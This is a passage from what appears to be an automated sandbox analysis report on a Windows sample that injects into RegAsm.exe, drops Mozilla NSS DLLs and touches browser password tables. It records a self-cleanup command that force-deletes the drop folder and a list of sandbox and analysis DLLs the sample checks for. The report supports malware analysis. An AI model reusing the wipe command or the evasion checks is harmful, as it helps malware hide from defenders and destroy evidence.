                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: HDGIJJ.2.dr, FCGCGD.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB5CE8 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB536 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
